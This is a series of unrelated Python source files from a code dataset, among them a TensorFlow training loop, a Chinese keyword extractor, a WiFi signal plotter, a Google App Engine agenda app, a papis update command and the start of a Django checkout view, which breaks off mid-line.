'tf_y:0': batch_y, 'keep_proba:0': 0.5}\r\n\r\n train_acc, train_cost, _ = self.sess.run(['accuracy:0', 'cost:0', 'train_op'], feed_dict=feed)\r\n\r\n self.training_cost.append(train_cost)\r\n\r\n self.training_accuracy.append(train_acc)\r\n\r\n if valid_set is not None:\r\n\r\n feed = {'tf_x:0': valid_set[0], 'tf_y:0': valid_set[1], 'keep_proba:0': 1}\r\n\r\n valid_acc, valid_cost = self.sess.run(['accuracy:0', 'cost:0'], feed_dict=feed)\r\n\r\n self.validation_cost.append(valid_cost)\r\n self.validation_accuracy.append(valid_acc)\r\n\r\n from sklearn.metrics import log_loss\r\n\r\n loss_feed = {'tf_x:0': train_set[0], 'tf_y:0': train_set[1], 'keep_proba:0': 1}\r\n\r\n y_pred = self.sess.run(['probabilities:0'], feed_dict=loss_feed)[0]\r\n\r\n loss = log_loss(y_true=train_set[1], y_pred=y_pred)\r\n\r\n print('Epoch: {} Avg Train Cost: {:.2f} Train Acc: {:.2f} Validation Acc: {:.2f} Error: {:.2f}'.format(epoch, train_cost, train_acc*100, valid_acc*100, loss))\r\n\r\n def batch_generator(self, data, batch_size=64, shuffle=True):\r\n \"\"\"Function used to generate data batches\r\n\r\n Parameters\r\n ----------\r\n data: tuple\r\n tuple of form (data, target)\r\n batch_size: int\r\n number of data elements in each batch\r\n shuffle: boolean\r\n if set to True, the data is shuffled with each new batch\r\n \"\"\"\r\n\r\n X, y = data\r\n\r\n if shuffle:\r\n p = np.random.permutation(y.shape[0])\r\n X, y = X[p], y[p]\r\n\r\n for i in range(0, X.shape[0], batch_size):\r\n\r\n X_batch = X[i: (i + batch_size), :]\r\n y_batch = y[i: (i + batch_size)]\r\n\r\n yield X_batch, y_batch\r\n\r\n\r\n def plot_train(self):\r\n \"\"\"Function used to plot the cost and accuracy (both of the training and validation set)\"\"\"\r\n\r\n from matplotlib import style\r\n\r\n style.use('bmh')\r\n\r\n fig, ax = plt.subplots(nrows=1, ncols=2)\r\n\r\n ax[0].plot(self.training_cost, lw=1, c='r', label='Training Cost')\r\n ax[0].plot(self.validation_cost, lw=1, c='limegreen', label='Validation Cost', ls='--')\r\n ax[0].legend(loc='upper right')\r\n ax[0].set_title('Training Cost')\r\n\r\n ax[1].plot(self.training_accuracy, lw=1, c='r', label='Training Accuracy')\r\n ax[1].plot(self.validation_accuracy, lw=1, c='limegreen', label='Validation Accuracy', ls='--')\r\n ax[1].legend(loc='upper right')\r\n ax[1].set_title('Training Accuracy')\r\n\r\n plt.show()\r\n\r\n\r\nclass ProgressBar():\r\n \"\"\"Custom progress bar that displays the progress of the training as the model iterates through the batches\r\n\r\n Parameters\r\n ----------\r\n data: array-like\r\n data that is used for training; note that this refers to the training data before the batches are generated\r\n bar_length: int\r\n length of progress bar displayed; purely cosmetic\r\n batch_size: int\r\n the number of elements in each batch of data\r\n \"\"\"\r\n\r\n def __init__(self, iter_count, bar_length=45, batch_size=64):\r\n\r\n self.iter_count = iter_count\r\n self.bar_length = bar_length\r\n self.batch_size = batch_size\r\n self.updates = 0\r\n\r\n def update(self):\r\n \"\"\"Function used to update the progress bar; note that this is done in a loop-like construction and the progress bar needs to be updated with each iteration\"\"\"\r\n\r\n end = False\r\n\r\n self.updates += 1\r\n\r\n progress = (self.updates*self.batch_size) / (self.iter_count)\r\n\r\n bars = int(np.floor(self.bar_length*progress))\r\n\r\n if self.updates*self.batch_size < self.iter_count:\r\n str1 = '[{}/{}]'.format(self.updates*self.batch_size, self.iter_count)\r\n str2 = '='*(bars - 1) + '>' + '-'*(self.bar_length - bars)\r\n\r\n else:\r\n str1 = '[{}/{}]'.format(self.iter_count, self.iter_count)\r\n str2 = '='*(self.bar_length - 1) + '>'\r\n end = True\r\n\r\n output = '\\r{}[{}]'.format(str1, str2)\r\n\r\n sys.stdout.write(output)\r\n sys.stdout.flush()\r\n\r\n if end:\r\n print('\\n')\r\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"131532032","text":"#coding=utf-8\n\"\"\"\n file: get_url_word.py\n desc: \n input: file(../data/all_urldoc_cate)\n output:\n name: han\n date: 20160818\n modify:\n\"\"\"\n\nimport sys\n#import thread\nimport json\nimport re\nimport os\nimport time\nfrom multiprocessing.pool import Pool\nfrom multiprocessing import Queue\n#import urllib\n#import urlparse\nfrom bs4 import BeautifulSoup\nsys.path.append('..')\nfrom util.util import exec_cmd, search_to_fpath\nimport pynlpir\nfrom collections import OrderedDict\npynlpir.open()\n#reload(sys)\n#sys.setdefaultencoding('UTF8')\n\n\ndef word_by_pynlpir(inputfile, word_dict, max_words=1000):\n\n weighted_word_list = pynlpir.get_key_words(inputfile, weighted=True, max_words=max_words)\n\n for word, weight in weighted_word_list:\n try:\n word_class = word_to_class(word)\n if word_class in ['time word', 'numeral', 'adverb', 'verb', \\\n 'locative word', 'distinguishing word']: continue\n if len(word) < 2: continue\n word_dict.setdefault(word, 0)\n word_dict[word] += weight\n except Exception as e:\n print (\"exception \" , e)\n\n\ndef wordclass_by_pynlpir(inputfile, word_dict, max_words=1000):\n\n weighted_word_list = pynlpir.get_key_words(inputfile, weighted=True, max_words=max_words)\n\n for word, weight in weighted_word_list:\n try:\n word_class = word_to_class(word)\n if word_class in ['time word', 'numeral', 'adverb', 'verb', \\\n 'locative word', 'distinguishing word']: continue\n if len(word) < 2: continue\n k = word + \"\\t\" + word_class\n word_dict.setdefault(k, 0)\n word_dict[k] += weight\n except Exception as e:\n print (e)\n\n\ndef allclass_by_pynlpir(inputfile, word_dict, max_words=1000):\n\n weighted_word_list = pynlpir.get_key_words(inputfile, weighted=True, max_words=max_words)\n\n for word, weight in weighted_word_list:\n try:\n word_class = word_to_class(word)\n k = word + \"\\t\" + word_class\n word_dict.setdefault(k, 0)\n word_dict[k] += weight\n except Exception as e:\n print (e)\n\ndef allword_by_pynlpir(inputfile, word_dict, max_words=1000):\n\n weighted_word_list = pynlpir.get_key_words(inputfile, weighted=True, max_words=max_words)\n\n for word, weight in weighted_word_list:\n try:\n word_dict.setdefault(word, 0)\n word_dict[word] += weight\n except Exception as e:\n print (e)\n\ndef allword_by_pynlpir_ordered(inputfile, max_words=1000):\n weighted_word_list = pynlpir.get_key_words(inputfile, weighted=True, max_words=max_words)\n word_dict = OrderedDict()\n\n for word, weight in weighted_word_list:\n try:\n word_dict.setdefault(word, 0)\n word_dict[word] += weight\n except Exception as e:\n print (e)\n \n return word_dict\n\ndef word_to_class(word):\n\n c = \"null\"\n c_list = []\n try:\n c_list = pynlpir.segment(word)\n except Exception as e:\n print (e)\n return c\n if len(c_list)>=1 and c_list[0][1] != None:\n c = c_list[-1][1]\n return c\n\ndef main_to_file(inputfile, outfile, max_words=1000):\n if os.path.exists(outfile):\n os.remove(outfile)\n\n word_dict = {}\n try:\n f = open(inputfile,'r').read().decode('utf-8', \"replace\")\n wordclass_by_pynlpir(f, word_dict, max_words=max_words)\n\n word_dict = sorted(word_dict.iteritems(), key=lambda d:d[1], reverse = True)\n except Exception as e:\n print (e)\n\n wfd = open(outfile, 'w')\n for k,w in word_dict:\n wfd.write(k + \"\\t\" + str(w) + \"\\n\")\n wfd.close()\n\ndef main(fkey=\"test\", max_words=1000):\n inputfile = \"../data/doc_\" + fkey\n outfile = \"../data/word_\" + fkey\n main_to_file(inputfile, outfile, max_words=max_words)\n\ndef split_main_file(inputfile, outfile, max_words=1000):\n path = os.path.dirname(inputfile)\n filename = os.path.basename(inputfile)\n\n # remove input_part\n l = search_to_fpath(path, filename)\n l.remove(inputfile)\n if len(l) > 0:\n for i in l:\n os.remove(i)\n\n exec_cmd(\"split -b 10m \" + inputfile + \" \" + inputfile)\n\n l = search_to_fpath(path, filename)\n l.remove(inputfile)\n if len(l) > 0:\n for i in l:\n postfix = i.split(inputfile)[1]\n o = outfile + postfix\n main(i, o, max_words=max_words)\n\ndef split_main(fkey, max_words=1000):\n inputfile = \"../data/doc_\" + fkey\n outfile = \"../data/word_\" + fkey\n split_main_file(inputfile, outfile, max_words=1000)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"lib/mob_autotag/word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"227604728","text":"# -*- encoding: utf-8 -*-\n\nclass CommandArguments(object):\n def __init__(self):\n self.value = None\n self.min = None\n self.max = None\n self.name = None\n self.pendingMode = None\n\n\nclass CommandArgument(object):\n\n ARGUMENT_SEPARATOR = \";\"\n KEY_VALUE_SEPARATOR = \"=\"\n\n def __init__(self, name, attributeName, dataType, setterMethod=None):\n self.name = name\n self.attributeName = attributeName\n self.value = None\n self.uninterpretedValue = None\n self.dataType = dataType\n self.setterMethod = setterMethod\n\n\nAVAILABLE_COMMAND_ARGUMENTS = {\n \"value\": CommandArgument(\"value\", None, float, \"setValueWithLimitsAdaptation\"),\n \"min\": CommandArgument(\"min\", None, float, \"setLowerLimit\"),\n \"Min\": CommandArgument(\"Min\", None, float, \"setLowerLimit\"),\n \"max\": CommandArgument(\"max\", None, float, \"setUpperLimit\"),\n \"Max\": CommandArgument(\"Max\", None, float, \"setUpperLimit\"),\n \"name\": CommandArgument(\"name\", \"displayName\", unicode),\n \"Name\": CommandArgument(\"Name\", \"displayName\", unicode),\n \"pending\": CommandArgument(\"pending\", None, None, \"setPendingSendMode\"),\n}","sub_path":"core/commandArgument.py","file_name":"commandArgument.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"359026301","text":"# WifiSignalPlotter.py\n#\tA quick script I've thrown together to get more familiar with Python\n#\tand to check the difference in signal level between two Wifi adaptors\n\n\"\"\" Produces a plot of WiFi strength \"\"\"\n\nimport subprocess\nimport re\nimport time\nimport platform\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nCONST_TIME_INTERVAL = 10\nCONST_NUM_SAMPLES = 100\n\nmeasuringError = 0.0\n\nplt.ion()\n\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nt = time.time()\n\narrayCreation = False\n\ntimes = np.empty(shape=(0))\n\ninterfaceDict = dict()\ninterfaceCount = 0\n\nwhile True:\n\n\tdataArray = []\n\n\tfor a in range(0, CONST_NUM_SAMPLES):\t# x in [beginning, end)\n\n\t\tif platform.system() == 'Linux':\n\t\t\tp = subprocess.Popen(\"iwconfig\", stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t\telif platform.system() == 'Windows':\n\t\t\tp = subprocess.Popen(\"netsh wlan show interfaces\", stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t\telse:\n\t\t\traise Exception('reached else of if statement')\n\t\tout = p.stdout.read().decode()\n\n\t\tif platform.system() == 'Linux':\n\t\t\tm = re.findall('(wlan[0-9]+).*?Signal level=(-[0-9]+) dBm', out, re.DOTALL)\n\t\telif platform.system() == 'Windows':\n\t\t\tm = re.findall('Name.*?:.*?([A-z0-9 ]*).*?Signal.*?:.*?([0-9]*)%', out, re.DOTALL)\n\t\telse:\n\t\t\traise Exception('reached else of if statement')\n\n\t\tp.communicate()\n\t\telapsed = time.time() - t\n\n\t\tif type(m) is not list:\n\t\t\traise Exception('not a list')\n\t\tfor mTuple in m:\n\t\t\tif type(mTuple) is not tuple:\n\t\t\t\traise Exception('not a tuple')\n\t\t\tif len(mTuple) != 2:\n\t\t\t\traise Exception('number of regex matches not 2')\n\t\t\tif len(mTuple) % 2 != 0: # useful if the regex results for multiple interfaces is in a single tuple\n\t\t\t\traise Exception('number of regex matches not divisible by 2')\n\t\t\tinterfaceName = mTuple[0]\n\t\t\tif interfaceName not in interfaceDict:\n\t\t\t\tinterfaceDict[interfaceName] = interfaceCount\n\t\t\t\tinterfaceCount += 1\n\n\t\tdataArray.append(m)\n\t\ttime.sleep(CONST_TIME_INTERVAL/CONST_NUM_SAMPLES)\n\n\tcounts = np.zeros(len(interfaceDict))\n\n\tsortedData = []\n\tfor i in range(0, len(interfaceDict)):\n\t\tsortedData.append([])\n\n\tif len(sortedData) != interfaceCount:\n\t\traise Exception('data table and number of devices not in agreement')\n\n\tfor dataTuples in dataArray:\n\t\tfor data in dataTuples:\n\t\t\tswitchResult = interfaceDict.get(data[0])\n\t\t\tcurrentCount = counts[switchResult]\n\t\t\tsortedData[switchResult].append(data[1])\n\t\t\tcounts[switchResult] += 1\n\n\n\tnumArray = []\n\tfor i in range(0, len(interfaceDict)):\n\t\tnumArray.append([])\n\n\tindex = 0\n\tfor dataSet in sortedData:\n\t\tfor sdata in dataSet:\n\t\t\tnumArray[index].append(int(sdata))\n\t\tindex += 1\n\n\tif 'avg' not in locals():\n\t\tavg = np.empty(shape=(len(interfaceDict), 0))\n\n\tif 'err' not in locals():\n\t\terr = np.empty(shape=(len(interfaceDict), 0))\n\n\tif platform.system() == 'Linux':\n\t\tmeasuringError = 0.5\n\telif platform.system() == 'Windows':\n\t\tmeasuringError = 0.5\n\telse:\n\t\traise Exception('reached else of if statement')\n\n\tindex = 0\n\tavgCurrent = np.zeros((len(interfaceDict), 1))\n\terrCurrent = np.zeros((len(interfaceDict), 1))\n\tfor numSet in numArray:\n\t\tavgCurrent[index] = np.mean(numSet)\n\t\tcombinedErr = np.sqrt(np.std(numSet)**2 + measuringError**2)\n\t\terrCurrent[index] = combinedErr\n\t\tindex += 1\n\n\tavg = np.append(avg, avgCurrent, axis=1)\n\terr = np.append(err, errCurrent, axis=1)\n\n\ttimes = np.append(times, elapsed)\n\n\tax.clear()\n\tplt.xlabel('Time [s]')\n\tif platform.system() == 'Linux':\n\t\tplt.ylabel('Signal Level [dBm]')\n\telif platform.system() == 'Windows':\n\t\tplt.ylabel('Signal Level [%]')\n\telse:\n\t\t\traise Exception('reached else of if statement')\n\tfor key, value in interfaceDict.items():\n\t\tplt.errorbar(times[:], avg[value, :], yerr=err[value, :], label=key)\n\tplt.legend()\n\tprint('\\n\\n')\n\n\tplt.pause(1)\n","sub_path":"WifiSignalPlotter.py","file_name":"WifiSignalPlotter.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"117761071","text":"#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport webapp2\nimport os.path\nimport datetime\nimport time\nimport logging\nimport random\nimport json\n\nimport webapp2\nimport jinja2\n\nfrom google.appengine.ext import db\nfrom google.appengine.api import users\nfrom google.appengine.api import memcache\n\n\njinja_environment = jinja2.Environment(autoescape=True,\n loader=jinja2.FileSystemLoader(os.path.join(os.path.dirname(__file__), 'templates')))\n\n\n\n# -- DATABASE MODELS --\n \nclass Todo(db.Model):\n contents = db.StringProperty()\n \n is_done = db.BooleanProperty(default=False)\n \n \n \nclass Meeting(db.Model):\n name = db.StringProperty()\n \n start_time = db.DateTimeProperty()\n end_time = db.DateTimeProperty()\n \n timestamp = db.DateTimeProperty(auto_now_add=True)\n is_latest = db.BooleanProperty(default=False)\n is_upcoming = db.BooleanProperty(default=True)\n is_someday = db.BooleanProperty(default=False)\n \n todos = db.ListProperty(db.Key) #todos in the particular meeting\n \n \nclass Agenda(db.Model):\n identifier = db.StringProperty()\n name = db.StringProperty()\n notes = db.StringProperty()\n \n timestamp = db.DateTimeProperty(auto_now_add=True)\n \n upcoming_meeting = db.ReferenceProperty(Meeting, collection_name=\"agenda_set_one\")\n someday_meeting = db.ReferenceProperty(Meeting, collection_name=\"agenda_set_two\")\n latest_meeting = db.ReferenceProperty(Meeting, collection_name=\"agenda_set_three\")\n \n meetings = db.ListProperty(db.Key) #meetings in the agenda, including someday\n \n \n# -- UTILITY FUNCTIONS --\n \ndef loadFileFromMemcache(filename):\n data = memcache.get('$file-%s' % filename)\n if data is not None:\n return data\n else:\n contents = []\n f = open(filename, 'r')\n for line in f:\n contents.append(line.strip())\n f.close()\n memcache.add('$file-%s' % filename, contents, 60)\n return contents \n \n \n#Returns a random color_adjective_animal pair as a unique name\ndef getNameHash():\n adjectives = loadFileFromMemcache('adj.new.txt')\n colors = loadFileFromMemcache('colors.new.txt')\n animals = loadFileFromMemcache('animals.new.txt')\n \n adj = adjectives[random.randint(0,len(adjectives)-1)]\n color = colors[random.randint(0,len(colors)-1)]\n animal = animals[random.randint(0,len(animals)-1)]\n \n return color + '_' + adj + '_' + animal\n \n\n# -- REQUEST HANDLERS --\n\nclass AgendaHandler(webapp2.RequestHandler):\n def get(self, agenda_id):\n #returns an agenda HTML for a particular agenda\n #this includes the current meeting, next meeting, someday, and all todos\n # (for security)\n #creates an empty agenda otherwise\n \n if agenda_id is None:\n #redirect to a new agenda\n rand_string = getNameHash()\n self.redirect('/'+rand_string)\n \n #check memcache for a response first\n template_render = memcache.get('$pg-%s' % agenda_id)\n if template_render is not None:\n self.response.out.write(template_render)\n return\n \n #retrieve the agenda, if it doesn't exist then make one\n q = Agenda.all()\n q.filter(\"identifier =\", agenda_id)\n agenda = q.get()\n if agenda is None:\n #create a new empty Agenda and empty Meetings \n agenda = Agenda()\n agenda.identifier = agenda_id\n agenda.name = \"New Meeting\"\n agenda.notes = \"Notes\"\n \n #build a new meeting\n now = datetime.datetime.now() #now rounded to 10 min mark\n now += datetime.timedelta(minutes=5)\n now -= datetime.timedelta(minutes=now.minute % 10) \n then = now + datetime.timedelta(hours=1) \n \n latest_meeting = Meeting()\n latest_meeting.is_upcoming = False\n latest_meeting.is_latest = True\n latest_meeting.start_time = now\n latest_meeting.end_time = then\n latest_meeting.put()\n \n #build an upcoming meeting\n now = datetime.datetime.now() #now rounded to 10 min mark one week from now \n now += datetime.timedelta(minutes=5)\n now -= datetime.timedelta(minutes=now.minute % 10) \n then = now + datetime.timedelta(hours=1) \n \n upcoming_meeting = Meeting()\n upcoming_meeting.start_time = now\n upcoming_meeting.end_time = then\n upcoming_meeting.put()\n \n #build a someday meeting\n someday_meeting = Meeting()\n someday_meeting.is_upcoming = False\n someday_meeting.is_someday = True\n someday_meeting.put()\n \n agenda.latest_meeting = latest_meeting\n agenda.upcoming_meeting = upcoming_meeting\n agenda.someday_meeting = someday_meeting\n agenda.put()\n else:\n #get the meeting references\n someday_meeting = agenda.someday_meeting\n upcoming_meeting = agenda.upcoming_meeting\n latest_meeting = agenda.latest_meeting\n \n #build the template\n template_values = {\n \"identifier\": agenda_id,\n }\n \n #render the page and cache it\n template = jinja_environment.get_template('agenda.htm')\n template_render = template.render(template_values)\n memcache.add('$pg-%s' % agenda_id, template_render, 60)\n \n \n self.response.out.write(template_render)\n \n def post(self, agenda_id):\n #provides metadata for an agenda like notes\n if agenda_id is None:\n self.error(500)\n return\n \n #retrieve the agenda\n q = Agenda.all()\n q.filter(\"identifier =\", agenda_id)\n agenda = q.get()\n if agenda is None:\n self.error(500)\n return\n \n name = self.request.get(\"name\", default_value=None)\n if (name is not None):\n agenda.name = name\n \n notes = self.request.get(\"notes\", default_value=None)\n if (notes is not None):\n agenda.notes = notes\n \n new_meeting = self.request.get(\"new_meeting\", default_value=None)\n if (new_meeting is not None):\n #creates a new UPCOMING meeting, and moves the current upcoming meeting to current one\n name = self.request.get(\"meeting_name\", default_value=None)\n if (name is None):\n name = ''\n \n #get current time rounded to 10 min mark one week from now \n now = datetime.datetime.now()\n now += datetime.timedelta(minutes=5)\n now -= datetime.timedelta(minutes=now.minute % 10) \n then = now + datetime.timedelta(hours=1) \n logging.info(now);\n meeting = Meeting()\n meeting.name = name\n meeting.start_time = now\n meeting.end_time = then\n meeting.put()\n \n #flip-flop the meetings and link new one\n agenda.latest_meeting.is_upcoming = False\n agenda.latest_meeting.is_latest = False\n agenda.latest_meeting.put()\n \n agenda.latest_meeting = agenda.upcoming_meeting\n agenda.upcoming_meeting = meeting\n \n agenda.put()\n \n #invalidate the json memcache\n memcache.delete('$ajax-%s' % agenda_id)\n \n \nclass AgendaAjaxHandler(webapp2.RequestHandler):\n def get(self, agenda_id):\n #does the same thing as AgendaHandler, but returns a JSON of template values\n # this is for AJAX style updating code\n if agenda_id is None:\n self.response.out.write('')\n return\n \n #retrieve the agenda, if it doesn't exist then make one\n q = Agenda.all()\n q.filter(\"identifier =\", agenda_id)\n agenda = q.get()\n if agenda is None:\n self.response.out.write('')\n return\n \n #check memcache for a response first\n json_response = memcache.get('$ajax-%s' % agenda_id)\n if json_response is not None:\n self.response.headers['Content-Type'] = 'text/plain'\n self.response.out.write(json_response)\n return\n \n #get the meeting references\n someday_meeting = agenda.someday_meeting\n upcoming_meeting = agenda.upcoming_meeting\n latest_meeting = agenda.latest_meeting\n \n #get the list of Todos for each meeting\n someday_todos_list = []\n for todo_key in someday_meeting.todos:\n todo = db.get(todo_key)\n if todo is None:\n continue\n \n todo_element = {\n \"key\": todo.key().id(),\n \"contents\": todo.contents,\n \"is_done\": todo.is_done\n }\n someday_todos_list.append(todo_element)\n \n latest_todos_list = []\n for todo_key in latest_meeting.todos:\n todo = db.get(todo_key)\n if todo is None:\n continue\n \n todo_element = {\n \"key\": todo.key().id(),\n \"contents\": todo.contents,\n \"is_done\": todo.is_done\n }\n latest_todos_list.append(todo_element)\n \n upcoming_todos_list = []\n for todo_key in upcoming_meeting.todos:\n todo = db.get(todo_key)\n if todo is None:\n continue\n \n todo_element = {\n \"key\": todo.key().id(),\n \"contents\": todo.contents,\n \"is_done\": todo.is_done\n }\n upcoming_todos_list.append(todo_element)\n \n #make the todos alphabetical\n someday_todos_list = sorted(someday_todos_list, key=lambda t: t[\"contents\"]) \n latest_todos_list = sorted(latest_todos_list, key=lambda t: t[\"contents\"])\n upcoming_todos_list = sorted(upcoming_todos_list, key=lambda t: t[\"contents\"]) \n \n #build the template\n template_values = {\n \"identifier\": agenda_id,\n \"name\": agenda.name,\n \"notes\": agenda.notes,\n \n \"time\": latest_meeting.start_time.strftime(\"%B %d, %Y\"),\n \n \"someday_key\": someday_meeting.key().id(),\n \"someday_name\": someday_meeting.name,\n \"someday_todos\": someday_todos_list,\n \n \"upcoming_key\": upcoming_meeting.key().id(),\n \"upcoming_name\": upcoming_meeting.name,\n \"upcoming_todos\": upcoming_todos_list,\n \n \"latest_key\": latest_meeting.key().id(),\n \"latest_name\": latest_meeting.name,\n \"latest_start\": int(time.mktime(latest_meeting.start_time.timetuple())) * 1000,\n \"latest_end\": int(time.mktime(latest_meeting.end_time.timetuple())) * 1000,\n \"latest_todos\": latest_todos_list\n }\n \n #render the response and cache it - just be sure to invalidate if changes\n json_response = json.dumps(template_values)\n memcache.add('$ajax-%s' % agenda_id, json_response, 60)\n \n self.response.headers['Content-Type'] = 'text/plain'\n self.response.out.write(json.dumps(template_values))\n \nclass MeetingHandler(webapp2.RequestHandler):\n def post(self):\n #provides metadata for an agenda like notes\n agenda_id = self.request.get('agenda_id', default_value=None)\n meeting_id = self.request.get('meeting_id', default_value=None)\n \n if meeting_id is None or agenda_id is None:\n self.error(500)\n return\n \n meeting = Meeting.get_by_id(int(meeting_id))\n if meeting is None:\n self.error(500)\n return\n \n name = self.request.get(\"name\", default_value=None)\n if (name is not None):\n meeting.name = name\n \n start_time = self.request.get(\"start_time\", default_value=None)\n if (start_time is not None):\n meeting.start_time = datetime.datetime.fromtimestamp(float(start_time))\n \n end_time = self.request.get(\"end_time\", default_value=None)\n if (end_time is not None):\n meeting.end_time = datetime.datetime.fromtimestamp(float(end_time))\n \n meeting.put()\n \n #invalidate the json memcache\n memcache.delete('$ajax-%s' % agenda_id)\n \n \nclass TodoHandler(webapp2.RequestHandler):\n def post(self):\n #modifies or deletes a todo\n #provides metadata for an agenda like notes\n agenda_id = self.request.get('agenda_id', default_value=None)\n todo_id = self.request.get('todo_id', default_value=None)\n logging.info(self.request.get(\"todo_id\"))\n if todo_id is None or agenda_id is None:\n self.error(500)\n return\n \n todo = Todo.get_by_id(int(todo_id))\n if todo is None:\n self.error(500)\n return\n \n should_delete = self.request.get(\"delete\", default_value=None)\n if should_delete is not None:\n todo.delete()\n return\n \n contents = self.request.get(\"contents\", default_value=None)\n if (contents is not None):\n todo.contents = contents\n \n is_done = self.request.get(\"is_done\", default_value=None)\n if (is_done is not None):\n todo.is_done = is_done == \"True\"\n \n is_done_switch = self.request.get(\"is_done_switch\", default_value=None)\n if (is_done_switch is not None):\n todo.is_done = not todo.is_done\n \n todo.put()\n \n #invalidate the json memcache\n memcache.delete('$ajax-%s' % agenda_id)\n \n \nclass NewTodoHandler(webapp2.RequestHandler):\n def post(self):\n #creates a new todo, marks it as done, or deletes an existing one\n # 'moving' a todo from meeting to meeting is really deleting and adding\n #provides metadata for an agenda like notes\n agenda_id = self.request.get('agenda_id', default_value=None)\n meeting_id = self.request.get('meeting_id', default_value=None)\n logging.info(meeting_id)\n if meeting_id is None or agenda_id is None:\n self.error(500)\n return\n \n meeting = Meeting.get_by_id(int(meeting_id))\n if meeting is None:\n self.error(500)\n return\n \n logging.info(meeting)\n \n contents = self.request.get(\"contents\", default_value=None)\n if (contents is None):\n self.error(500)\n return\n \n logging.info(contents)\n \n todo = Todo() \n todo.contents = contents\n \n is_done = self.request.get(\"is_done\", default_value=None)\n if (is_done is not None):\n todo.is_done = is_done == \"True\";\n \n todo.put()\n \n logging.info(todo)\n \n meeting.todos.append(todo.key())\n meeting.put()\n \n #invalidate the json memcache\n memcache.delete('$ajax-%s' % agenda_id)\n \n \n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n #redirect to a new agenda\n rand_string = getNameHash()\n logging.error(rand_string)\n self.redirect('/'+rand_string)\n\napp = webapp2.WSGIApplication([\n ('/newtodo', NewTodoHandler),\n ('/todo', TodoHandler),\n ('/meeting', MeetingHandler),\n ('/AJAX/([a-zA-Z0-9_]*)', AgendaAjaxHandler),\n ('/([a-zA-Z0-9_]+)', AgendaHandler),\n ('/', MainHandler)\n], debug=True)\n","sub_path":"agenda-tool/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"341745115","text":"import papis\nimport os\nimport shutil\nimport papis.utils\nimport papis.bibtex\nimport papis.downloaders.utils\n\n\nclass Update(papis.commands.Command):\n def init(self):\n\n self.parser = self.get_subparsers().add_parser(\n \"update\",\n help=\"Update a document from a given library\"\n )\n\n self.parser.add_argument(\n \"--from-bibtex\",\n help=\"Update info from bibtex file\",\n action=\"store\"\n )\n\n self.parser.add_argument(\n \"-i\",\n \"--interactive\",\n help=\"Interactively update\",\n default=False,\n action=\"store_true\"\n )\n\n self.parser.add_argument(\n \"-f\",\n \"--force\",\n help=\"Force update, overwrite conflicting information\",\n default=False,\n action=\"store_true\"\n )\n\n self.parser.add_argument(\n \"-d\",\n \"--document\",\n help=\"Overwrite an existing document\",\n default=None,\n action=\"store\"\n )\n\n self.parser.add_argument(\n \"--from-url\",\n help=\"Get document or information from url\",\n default=None,\n action=\"store\"\n )\n\n self.parser.add_argument(\n \"document\",\n help=\"Document search\",\n nargs=\"?\",\n default=\".\",\n action=\"store\"\n )\n\n def main(self):\n documentsDir = os.path.expanduser(self.config[self.args.lib][\"dir\"])\n self.logger.debug(\"Using directory %s\" % documentsDir)\n documentSearch = self.args.document\n data = papis.bibtex.bibtex_to_dict(self.args.from_bibtex) \\\n if self.args.from_bibtex else dict()\n documents = papis.utils.get_documents_in_dir(\n documentsDir,\n documentSearch\n )\n document = self.pick(documents)\n if self.args.from_url:\n url_data = papis.downloaders.utils.get(self.args.from_url)\n data.update(url_data[\"data\"])\n document_paths = url_data[\"documents_paths\"]\n if not len(document_paths) == 0:\n document_path = document_paths[0]\n old_doc = self.pick(document[\"files\"])\n if not input(\"Really replace document %s? (Y/n): \" % old_doc) in [\"N\", \"n\"]:\n new_path = os.path.join(\n document.get_main_folder(), old_doc\n )\n self.logger.debug(\n \"Moving %s to %s\" %(document_path, new_path)\n )\n shutil.move(document_path, new_path)\n document.update(data, self.args.force, self.args.interactive)\n document.save()\n","sub_path":"papis/commands/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"171488293","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\nfrom .forms import CheckoutForm\nfrom .models import Address\nfrom cart.models import Order\nimport string\nimport random\n\n\ndef create_ref_code():\n return ''.join(random.choices(string.ascii_lowercase + string.digits, k=25))\n\ndef checkout_view(request):\n\n#---#POST\n if request.method == 'POST':\n form = CheckoutForm(request.POST or None)\n order = Order.objects.get(user= request.user, ordered=False)\n if form.is_valid():\n # useing degault billing address\n first_name = request.POST.get(\"first_name\")\n last_name = request.POST.get(\"last_name\")\n default_billing = request.POST.get('default_billing_address')\n ship_diffrent_address = request.POST.get('ship_diffrent_address')\n if default_billing:\n billing_address = Address.objects.filter(user=request.user,\n default_address=True,\n address_type='B').last()\n order.billing_address = billing_address\n if not ship_diffrent_address:\n order.shipping_address = billing_address\n order.code = create_ref_code()\n order.ordered = True\n order.in_way = True\n order.save()\n else:\n\n #new billing address\n billing_country = request.POST.get(\"billing_country\")\n address = request.POST.get(\"address\")\n zip_code = 